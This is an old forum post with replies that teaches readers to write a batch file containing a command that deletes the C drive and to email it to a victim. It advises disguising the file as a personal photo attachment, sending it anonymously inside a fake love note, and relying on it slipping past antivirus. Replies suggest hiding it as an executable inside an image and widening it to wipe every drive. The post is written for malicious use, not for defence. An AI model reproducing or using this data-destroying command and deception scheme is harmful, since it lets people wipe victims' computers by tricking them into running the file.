Ok First of all the c drive is where things are stored on a computer. If you did not know that then... this egg may not be for you. The c drive is what you will soon be able to delete from somebod’s computer.

>Open up Notepad. This is a standard on Windows, comes under Accessories. I do not know the Mac equivalent, if you do, leave it in a comment please.

> Write the following, EXACTLY

deltree /y C:\\

This a command to a computer to delete the c drive.

>Save this as a .bat file, and email it to somebody who’s life you wish to make hellish.

warning: until you use it i would advise you to save it as a .txt file, to avoid accidental clicking on it and destroying your computer.

Warning 2: This relies on your victim opening the file. So give it an enticing name. Avoid ’free porn here’ or whatever as it is too stereotypical, and they may catch on. There are many ways to send anonymous email detailed on this site, so you could send a fake love note, with your file attached, but call it "pics of me on the beach.bat" or whatever.

And some good news: This gets past Norton Antivirus Ssoftware as it is only a command!

Over and Out!

this could work...if i then compiled the .bat into an .exe file and hid that inside an image file...

Dec 02, 2006 2:28 pm - Stupid People Might Fall For It, BUT . . .
Not everybody uses their C drive as their main storage area.

I use 2 separate physical hard drives, C & D are virtual drives on the first one and E is a separate Physical Drive, I don’t store ANYTHING on C, barely anything on D and MOST EVERYTHING on E.

I have re-installed Windows numerous times and have yet to loose even one thing, NONE! It’s gonna take a complete E Drive Failure for anything to be lost.

At worst if I was stupid enough to download and click your BAT file I would only loose the OS, which is easily re-installed, and NONE of the files I have spent YEARS collecting.

However I am NOT easily fooled, so I doubt this scenario is at all feasible.

I gave you a 3’s because there ARE silly bastids that would be stupid enough to fall for this.

^ Ah but most people do store on the c drive. and you can also alter the command to delete any or all of the drives. i just used the c drive as an example.
